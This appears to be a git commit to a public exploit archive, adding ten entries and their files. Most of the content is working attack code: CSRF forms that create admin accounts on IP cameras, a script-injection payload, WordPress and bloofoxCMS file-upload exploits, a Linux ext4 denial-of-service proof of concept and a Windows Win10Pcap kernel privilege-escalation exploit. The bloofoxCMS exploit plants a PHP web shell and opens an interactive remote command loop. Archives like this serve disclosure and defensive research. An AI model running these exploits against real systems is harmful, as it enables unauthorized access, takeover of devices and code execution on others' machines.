DB: 2015-11-01

10 new exploits
2015-11-01 05:01:56 +00:00 · 2015-11-01 05:01:56 +00:00 · 6123605b39
commit 6123605b39
parent 6dfa3e2539
11 changed files with 517 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -34855,3 +34855,12 @@ id,file,description,date,author,platform,type,port
 38578,platforms/php/webapps/38578.txt,"Pligg CMS 2.0.2 - Directory Traversal",2015-10-30,"Curesec Research Team",php,webapps,0
 38579,platforms/php/webapps/38579.txt,"Pligg CMS 2.0.2 - CSRF Code Execution",2015-10-30,"Curesec Research Team",php,webapps,0
 38581,platforms/php/webapps/38581.txt,"Oxwall 1.7.4 - CSRF Vulnerability",2015-10-30,"High-Tech Bridge SA",php,webapps,0
 38582,platforms/hardware/remote/38582.html,"Brickcom Multiple IP Cameras Cross Site Request Forgery Vulnerability",2013-06-12,Castillo,hardware,remote,0
 38583,platforms/hardware/remote/38583.html,"Sony CH and DH Series IP Cameras Multiple Cross Site Request Forgery Vulnerabilities",2013-06-12,Castillo,hardware,remote,0
 38584,platforms/hardware/remote/38584.txt,"Grandstream Multiple IP Cameras Cross Site Request Forgery Vulnerability",2013-06-12,Castillo,hardware,remote,0
 38585,platforms/php/webapps/38585.pl,"WordPress NextGEN Gallery 'upload.php' Arbitrary File Upload Vulnerability",2013-06-12,"Marcos Garcia",php,webapps,0
 38586,platforms/android/remote/38586.txt,"TaxiMonger for Android 'name' Parameter HTML Injection Vulnerability",2013-06-15,"Ismail Kaleem",android,remote,0
 38587,platforms/multiple/remote/38587.txt,"Monkey HTTP Daemon Mandril Security Plugin Security Bypass Vulnerability",2013-06-14,felipensp,multiple,remote,0
 38588,platforms/php/webapps/38588.php,"bloofoxCMS 'index.php' Arbitrary File Upload Vulnerability",2013-06-17,"CWH Underground",php,webapps,0
 38589,platforms/linux/dos/38589.c,"Linux Kernel <= 3.0.5 'test_root()' Function Local Denial of Service Vulnerability",2013-06-05,"Jonathan Salwan",linux,dos,0
 38590,platforms/php/webapps/38590.txt,"et-chat Privilege Escalation and Arbitrary Shell Upload Vulnerabilities",2013-06-18,MR.XpR,php,webapps,0
--- a/platforms/android/remote/38586.txt
+++ b/platforms/android/remote/38586.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/60566/info
 TaxiMonger for Android is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
 Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
 TaxiMonger 2.6.2 and 2.3.3 are vulnerable; other versions may also be affected. 
 <Script Language='Javascript'> <!-- document.write(unescape('%3C%69%6D%61%67%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%76%75%6C%6E%2D%6C%61%62 %2E%63%6F%6D%20%6F%6E%65%72%72%6F%72%3D%61%6C%65%72%74%28%27%69%73%6D%61%69%6C%6B%61%6C%65%65%6D%27%29%20%2F%3E')); //--> </Script> 
--- a/platforms/hardware/remote/38582.html
+++ b/platforms/hardware/remote/38582.html
@ -0,0 +1,20 @@
 source: http://www.securityfocus.com/bid/60526/info
 Brickcom multiple IP cameras are prone to a cross-site request-forgery vulnerability.
 Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible.
 Brickcom cameras running firmware 3.0.6.7, 3.0.6.12, and 3.0.6.16C1 are vulnerable; other versions may also be affected. 
 <html>
 <body>
 <form name="gobap" action="http://xx.xx.xx.xx/cgi-bin/users.cgi"; method="POST">
 <input type="hidden" name="action" value="add">
 <input type="hidden" name="index" value="0">
 <input type="hidden" name="username" value="test2">
 <input type="hidden" name="password" value="test2">
 <input type="hidden" name="privilege" value="1">
 <script>document.gobap.submit();</script>
 </form>
 </body>
 </html> 
--- a/platforms/hardware/remote/38583.html
+++ b/platforms/hardware/remote/38583.html
@ -0,0 +1,26 @@
 source: http://www.securityfocus.com/bid/60529/info
 Sony CH and DH series IP cameras including SNCCH140, SNCCH180, SNCCH240, SNCCH280, SNCDH140, SNCDH140T, SNCDH180, SNCDH240, SNCDH240T, and SNCDH280 are prone to multiple cross-site request-forgery vulnerabilities.
 Exploiting these issues may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks. 
 <html>
 <body>
  <form name="SonyCsRf" action="http://xx.xx.xx.xx/command/user.cgi" method="POST">
    <input type="Select" name="ViewerModeDefault" value="00000fff">
    <input type="Hidden" name="ViewerAuthen" value="off">
    <input type="Hidden" name="Administrator" value="YWRtaW46YWRtaW4=">
    <input type="Hidden" name="User1" value="xxxx,c0000fff">
    <input type="Hidden" name="User2" value="xxxx,c0000fff">
    <input type="Hidden" name="User3" value="dG1wdG1wOnRtcHRtcA==,c0000fff">
    <input type="Hidden" name="User4" value="Og==,00000fff">
    <input type="Hidden" name="User5" value="Og==,00000fff">
    <input type="Hidden" name="User6" value="Og==,00000fff">
    <input type="Hidden" name="User7" value="Og==,00000fff">
    <input type="Hidden" name="User8" value="Og==,00000fff">
    <input type="Hidden" name="User9" value="Og==,00000fff">
    <input type="Hidden" name="Reload" value="referer">
    <script>document.SonyCsRf.submit();</script>
 </form>
 </body>
 </html>
--- a/platforms/hardware/remote/38584.txt
+++ b/platforms/hardware/remote/38584.txt
@ -0,0 +1,7 @@
 source: http://www.securityfocus.com/bid/60532/info
 Grandstream multiple IP cameras including GXV3501, GXV3504, GXV3601, GXV3601HD/LL, GXV3611HD/LL, GXV3615W/P, GXV3651FHD, GXV3662HD, GXV3615WP_HD, and GXV3500 are prone to a cross-site request-forgery vulnerability.
 Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks. 
 http://www.example.com/goform/usermanage?cmd=add&user.name=test3&user.password=test3&user.level=0 
--- a/platforms/linux/dos/38589.c
+++ b/platforms/linux/dos/38589.c
@ -0,0 +1,58 @@
 source: http://www.securityfocus.com/bid/60586/info
 The Linux Kernel is prone to a local denial-of-service vulnerability.
 Local attackers can exploit this issue to trigger an infinite loop which may cause denial-of-service conditions. 
 /*
 ** PoC - kernel <= 3.10 CPU Thread consumption in ext4 support. (Infinite loop)
 ** Jonathan Salwan - 2013-06-05
 */
 #include <errno.h>
 #include <fcntl.h>
 #include <linux/fs.h>
 #include <stdio.h>
 #include <sys/ioctl.h>
 #include <sys/stat.h>
 #include <sys/types.h>
 struct ext4_new_group_input {
        __u32 group;
        __u64 block_bitmap;
        __u64 inode_bitmap;
        __u64 inode_table;
        __u32 blocks_count;
        __u16 reserved_blocks;
        __u16 unused;
 };
 #define EXT4_IOC_GROUP_ADD  _IOW('f', 8, struct ext4_new_group_input)
 int main(int ac, const char *av[]){
  struct ext4_new_group_input input;
  int fd;
  if (ac < 2){
    printf("Syntax  : %s <ext4 device>\n", av[0]);
    printf("Example : %s /tmp\n", av[0]);
    return -1;
  }
  printf("[+] Opening the ext4 device\n");
  if ((fd = open(av[1], O_RDONLY)) < 0){
    perror("[-] open");
    return -1;
  }
  printf("[+] Trigger the infinite loop\n");
  input.group = -1;
  if (ioctl(fd, EXT4_IOC_GROUP_ADD, &input) < 0){
    perror("[-] ioctl");
  }
  close(fd);
  return 0;
 }
--- a/platforms/multiple/remote/38587.txt
+++ b/platforms/multiple/remote/38587.txt
@ -0,0 +1,7 @@
 source: http://www.securityfocus.com/bid/60569/info
 The Mandril Security plugin for Monkey HTTP Daemon is prone to a security-bypass vulnerability.
 An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions, which may aid in launching further attacks 
 http://www.example.com/%2ftest/ 
--- a/platforms/php/webapps/38585.pl
+++ b/platforms/php/webapps/38585.pl
@ -0,0 +1,30 @@
 source: http://www.securityfocus.com/bid/60533/info
 The NextGEN Gallery plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files.
 An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in an arbitrary code execution within the context of the vulnerable application.
 NextGEN Gallery 1.9.12 is vulnerable; other versions may also be affected. 
 #! /usr/bin/perl 
 use LWP; 
 use HTTP::Request::Common; 
 my ($url, $file) = @ARGV; 
 my $ua = LWP::UserAgent->new(); 
 my $req = POST $url, 
 Content_Type => 'form-data', 
 Content => [. 
 name => $name, 
 galleryselect => 1, # Gallery ID, should exist 
 Filedata => [ "$file", "file.gif", Content_Type => 
 'image/gif' ] 
 ]; 
 my $res = $ua->request( $req ); 
 if( $res->is_success ) { 
 print $res->content; 
 } else { 
 print $res->status_line, "\n"; 
 } 
--- a/platforms/php/webapps/38588.php
+++ b/platforms/php/webapps/38588.php
@ -0,0 +1,137 @@
 source: http://www.securityfocus.com/bid/60585/info
 bloofoxCMS is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
 An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
 bloofoxCMS 0.5.0 is vulnerable;other versions may also be affected. 
 <?php
 /*
  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O .. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /        
  / XXXXXX /
 (________(          
  `------'
 Exploit Title   : Bloofox CMS Unrestricted File Upload Exploit
 Date            : 17 June 2013
 Exploit Author  : CWH Underground
 Site            : www.2600.in.th
 Vendor Homepage : http://www.bloofox.com/
 Software Link   : http://jaist.dl.sourceforge.net/project/bloofox/bloofoxCMS/bloofoxCMS_0.5.0.7z
 Version         : 0.5.0
 Tested on       : Window and Linux
 #####################################################
 VULNERABILITY: Unrestricted File Upload 
 #####################################################
 This application has an upload feature that allows an authenticated user
 with Administrator roles or Editor roles to upload arbitrary files to media
 directory cause remote code execution by simply request it.
 #####################################################
 EXPLOIT
 #####################################################
 */
 error_reporting(0);
 set_time_limit(0);
 ini_set("default_socket_timeout", 5);
 function http_send($host, $packet)
 {
    if (!($sock = fsockopen($host, 80)))
        die("\n[-] No response from {$host}:80\n");
    fputs($sock, $packet);
    return stream_get_contents($sock);
 }
 if ($argc < 3)
 {
 print "\n==============================================\n";
 print "  Bloofox CMS Unrestricted File Upload Exploit  \n";
 print "                                              \n";
 print "        Discovered By CWH Underground         \n";
 print "==============================================\n\n";
 print "  ,--^----------,--------,-----,-------^--,   \n";
 print "  | |||||||||   `--------'     |          O   \n";
 print "  `+---------------------------^----------|   \n";
 print "    `\_,-------, _________________________|   \n";
 print "      / XXXXXX /`|     /                      \n";
 print "     / XXXXXX /  `\   /                       \n";
 print "    / XXXXXX /\______(                        \n";
 print "   / XXXXXX /                                 \n";
 print "  / XXXXXX /   .. CWH Underground Hacking Team ..  \n";
 print " (________(                                   \n";
 print "  `------'                                    \n\n";
 print "\nUsage......: php $argv[0] <host> <path> <user> <password>\n";
 print "\nExample....: php $argv[0] target /bloofoxcms/ editor editor\n";
    die();
 }
 $host = $argv[1];
 $path = $argv[2];
 $payload = "username={$argv[3]}&password={$argv[4]}&action=login";
 $packet  = "POST {$path}admin/index.php HTTP/1.0\r\n";
 $packet .= "Host: {$host}\r\n";
 $packet .= "Referer: {$host}{$path}admin/index.php\r\n";
 $packet .= "Content-Length: ".strlen($payload)."\r\n";
 $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
 $packet .= "Connection: close\r\n\r\n{$payload}";
 $response = http_send($host, $packet);
 if (!preg_match("/Location: index.php/i", $response)) die("\n[-] Login failed!\n");
 if (!preg_match("/Set-Cookie: ([^;]*);/i", $response, $sid)) die("\n[-] Session ID not found!\n");
 print "\n..:: Login Successful ::..\n";
 print "\n..::   Waiting hell   ::..\n\n";
 $payload  = "--o0oOo0o\r\n";
 $payload .= "Content-Disposition: form-data; name=\"filename\"; filename=\"sh.php\"\r\n";
 $payload .= "Content-Type: application/octet-stream\r\n\r\n";
 $payload .= "<?php error_reporting(0); print(___); passthru(base64_decode(\$_SERVER[HTTP_CMD]));\r\n";
 $payload .= "--o0oOo0o--\r\n";
 $packet  = "POST {$path}admin/index.php?mode=content&page=media&action=new HTTP/1.0\r\n";
 $packet .= "Host: {$host}\r\n";
 $packet .= "Referer: {$host}{$path}admin/index.php?mode=content&page=media&action=new\r\n";
 $packet .= "Cookie: {$sid[1]}\r\n";
 $packet .= "Content-Length: ".strlen($payload)."\r\n";
 $packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
 $packet .= "Connection: close\r\n\r\n{$payload}";
 http_send($host, $packet);
 $packet  = "GET {$path}media/files/sh.php HTTP/1.0\r\n";
 $packet .= "Host: {$host}\r\n";
 $packet .= "Cmd: %s\r\n";
 $packet .= "Connection: close\r\n\r\n";
 while(1)
 {
    print "\nBloofox-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    $response = http_send($host, sprintf($packet, base64_encode($cmd)));
    preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
 }
 ?>
--- a/platforms/php/webapps/38590.txt
+++ b/platforms/php/webapps/38590.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/60660/info
 et-chat is prone to a privilege-escalation vulnerability and an arbitrary shell-upload vulnerability.
 An attacker can exploit these issues to gain elevated privileges within the application and upload arbitrary shells; this can result in an arbitrary code execution within the context of the vulnerable application.
 et-chat 3.07 is vulnerable; other versions may also be affected. 
 http://www.example.com/chat/?AdminRegUserEdit&admin&id=4 
--- a/platforms/windows/local/38542.cpp
+++ b/platforms/windows/local/38542.cpp
@ -0,0 +1,205 @@
 # Source: https://github.com/Rootkitsmm/Win10Pcap-Exploit
 /*
 Win10Pcap kernel-mode driver did not check the virtual addresses which are passed from the user-mode , IOCTL Using Neither Buffered Nor Direct I/O without ProbeForWrite to validating passed address
 you need find accurate Device name in runtime to send IOCTL , hardcoded device name dont lead to vulnerable code
 IOCTL handller write a string in passed address , string is something like "Global\WTCAP_EVENT_3889023063_1"
 ther was many way to exploit this vulnerability i decide to set privilege in process TOKEN with overwriting _SEP_TOKEN_PRIVILEGES
 overwriting token at address 0x034 with string "Global\WTCAP_EVENT" can set SeDebugPrivilege without corrupting sensitive Filds
 */
 #include <stdio.h>
 #include <tchar.h>
 #include<Windows.h>
 #include<stdio.h>
 #include <winternl.h>
 #include <intrin.h>
 #include <psapi.h>
 #include <strsafe.h>
 #include <assert.h>
 #define	SL_IOCTL_GET_EVENT_NAME		CTL_CODE(0x8000, 1, METHOD_NEITHER, FILE_ANY_ACCESS)
 #define STATUS_SUCCESS					((NTSTATUS)0x00000000L)
 #define STATUS_INFO_LENGTH_MISMATCH		((NTSTATUS)0xc0000004L)
 /* found with :
 !token 
 1: kd> dt nt!_OBJECT_HEADER
   +0x000 PointerCount     : Int4B
   +0x004 HandleCount      : Int4B
   +0x004 NextToFree       : Ptr32 Void
   +0x008 Lock             : _EX_PUSH_LOCK
   +0x00c TypeIndex        : UChar
   +0x00d TraceFlags       : UChar
   +0x00e InfoMask         : UChar
   +0x00f Flags            : UChar
   +0x010 ObjectCreateInfo : Ptr32 _OBJECT_CREATE_INFORMATION
   +0x010 QuotaBlockCharged : Ptr32 Void
   +0x014 SecurityDescriptor : Ptr32 Void
   +0x018 Body             : _QUAD
 TypeIndex is 0x5
 */
 #define HANDLE_TYPE_TOKEN				0x5
 // Undocumented SYSTEM_INFORMATION_CLASS: SystemHandleInformation
 const SYSTEM_INFORMATION_CLASS SystemHandleInformation = 
 (SYSTEM_INFORMATION_CLASS)16;
 // The NtQuerySystemInformation function and the structures that it returns 
 // are internal to the operating system and subject to change from one 
 // release of Windows to another. To maintain the compatibility of your 
 // application, it is better not to use the function.
 typedef NTSTATUS (WINAPI * PFN_NTQUERYSYSTEMINFORMATION)(
 	IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
 	OUT PVOID SystemInformation,
 	IN ULONG SystemInformationLength,
 	OUT PULONG ReturnLength OPTIONAL
 	);
 // Undocumented structure: SYSTEM_HANDLE_INFORMATION
 typedef struct _SYSTEM_HANDLE 
 {
 	ULONG ProcessId;
 	UCHAR ObjectTypeNumber;
 	UCHAR Flags;
 	USHORT Handle;
 	PVOID Object;
 	ACCESS_MASK GrantedAccess;
 } SYSTEM_HANDLE, *PSYSTEM_HANDLE;
 typedef struct _SYSTEM_HANDLE_INFORMATION 
 {
 	ULONG NumberOfHandles;
 	SYSTEM_HANDLE Handles[1];
 } SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
 // Undocumented FILE_INFORMATION_CLASS: FileNameInformation
 const FILE_INFORMATION_CLASS FileNameInformation = 
 (FILE_INFORMATION_CLASS)9;
 // The NtQueryInformationFile function and the structures that it returns 
 // are internal to the operating system and subject to change from one 
 // release of Windows to another. To maintain the compatibility of your 
 // application, it is better not to use the function.
 typedef NTSTATUS (WINAPI * PFN_NTQUERYINFORMATIONFILE)(
 	IN HANDLE FileHandle,
 	OUT PIO_STATUS_BLOCK IoStatusBlock,
 	OUT PVOID FileInformation,
 	IN ULONG Length,
 	IN FILE_INFORMATION_CLASS FileInformationClass
 	);
 // FILE_NAME_INFORMATION contains name of queried file object.
 typedef struct _FILE_NAME_INFORMATION {
 	ULONG FileNameLength;
 	WCHAR FileName[1];
 } FILE_NAME_INFORMATION, *PFILE_NAME_INFORMATION;
 void* FindTokenAddressHandles(ULONG pid)
 {
 	/////////////////////////////////////////////////////////////////////////
 	// Prepare for NtQuerySystemInformation and NtQueryInformationFile.
 	// 
 	// The functions have no associated import library. You must use the 
 	// LoadLibrary and GetProcAddress functions to dynamically link to 
 	// ntdll.dll.
 	HINSTANCE hNtDll = LoadLibrary(_T("ntdll.dll"));
 	assert(hNtDll != NULL);
 	PFN_NTQUERYSYSTEMINFORMATION NtQuerySystemInformation = 
 		(PFN_NTQUERYSYSTEMINFORMATION)GetProcAddress(hNtDll, 
 		"NtQuerySystemInformation");
 	assert(NtQuerySystemInformation != NULL);
 	/////////////////////////////////////////////////////////////////////////
 	// Get system handle information.
 	// 
 	DWORD nSize = 4096, nReturn;
 	PSYSTEM_HANDLE_INFORMATION pSysHandleInfo = (PSYSTEM_HANDLE_INFORMATION)
 		HeapAlloc(GetProcessHeap(), 0, nSize);
 	// NtQuerySystemInformation does not return the correct required buffer 
 	// size if the buffer passed is too small. Instead you must call the 
 	// function while increasing the buffer size until the function no longer 
 	// returns STATUS_INFO_LENGTH_MISMATCH.
 	while (NtQuerySystemInformation(SystemHandleInformation, pSysHandleInfo, 
 		nSize, &nReturn) == STATUS_INFO_LENGTH_MISMATCH)
 	{
 		HeapFree(GetProcessHeap(), 0, pSysHandleInfo);
 		nSize += 4096;
 		pSysHandleInfo = (SYSTEM_HANDLE_INFORMATION*)HeapAlloc(
 			GetProcessHeap(), 0, nSize);
 	}
 	for (ULONG i = 0; i < pSysHandleInfo->NumberOfHandles; i++)
 	{
 		PSYSTEM_HANDLE pHandle = &(pSysHandleInfo->Handles[i]);
 		if (pHandle->ProcessId == pid && pHandle->ObjectTypeNumber == HANDLE_TYPE_TOKEN)
 		{
 			printf(" ObjectTypeNumber %d , ProcessId %d , Object  %p \r\n",pHandle->ObjectTypeNumber,pHandle->ProcessId,pHandle->Object);
 			return pHandle->Object;
 		}
 	}
 	/////////////////////////////////////////////////////////////////////////
 	// Clean up.
 	// 
 	HeapFree(GetProcessHeap(), 0, pSysHandleInfo);
 	return 0;
 }
 void main()
 {
 	DWORD dwBytesReturned;
 	DWORD ShellcodeFakeMemory;
 	HANDLE token;
 	// first create toke handle so find  object address with handle 
 	if(!OpenProcessToken(GetCurrentProcess(),TOKEN_QUERY,&token))
 		DebugBreak();
 	void* TokenAddress = FindTokenAddressHandles(GetCurrentProcessId());
 	CloseHandle(token);
 	// i dont want write fully weaponized exploit so criminal must write code to find  "WTCAP_A_{B8296C9f-8ed4-48A2-84A0-A19DB94418E3" in runtime ( simple task :)  
 	HANDLE hDriver = CreateFileA("\\\\.\\WTCAP_A_{B8296C9f-8ed4-48A2-84A0-A19DB94418E3}",GENERIC_READ | GENERIC_WRITE,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
  if(hDriver!=INVALID_HANDLE_VALUE)
  {
 	   fprintf(stderr," Open Driver OK\n");
 	  if (!DeviceIoControl(hDriver, SL_IOCTL_GET_EVENT_NAME, NULL,0x80,(void*)((char*)TokenAddress+0x34),NULL,&dwBytesReturned, NULL))
 	  {
 		  fprintf(stderr,"send IOCTL error %d.\n",GetLastError());
 		  return;
 	  }
 	  else  fprintf(stderr," Send IOCTL OK\n");
  }
  else 
  {
 	  fprintf(stderr," Open Driver error %d.\n",GetLastError());
 	  return;
  }
  CloseHandle(hDriver);
  getchar();
 }